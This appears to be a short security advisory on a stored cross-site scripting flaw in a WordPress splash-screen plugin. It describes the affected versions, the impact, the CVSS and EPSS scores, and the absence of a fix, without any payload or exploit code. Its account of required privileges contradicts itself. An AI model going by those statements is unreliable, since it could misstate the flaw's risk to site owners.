The vulnerability is a classic stored cross‑site scripting flaw that occurs when the N360 | Splash Screen plugin fails to properly neutralize user input before rendering it in web pages. Attackers can inject malicious JavaScript that will be executed in the browsers of any user that views the affected page, enabling session hijacking, cookie theft, or defacement. The impact is confined to the confidentiality and integrity of affected site visitors and those with access to the plugin’s settings, but could be used to poison entire site sessions if an administrator imports the payload through the plugin.

bistromatic’s N360 | Splash Screen plugin is vulnerable in all releases up through version 1. 0.6, inclusive, with unknown prior baseline. The plugin is a WordPress add‑on that provides front‑page splash screens for sites—any WordPress installation running these versions is affected. No official fix is currently published, so the vulnerability remains until bistromatic releases a patched version.

The CVSS score of 5.9 reflects moderate severity, and the EPSS score of less than 1% indicates that automated exploitation of this flaw is unlikely at present. The vulnerability is not catalogued in CISA’s KEV set. An attacker would need to supply content to the plugin’s input fields, which typically requires some level of user‑account access; once the malicious script is stored, it is served to all visitors. Because the flaw exploits a purely front‑end input validation weakness, it can be triggered without additional privileges, but the damage is limited to the affected site’s visitors.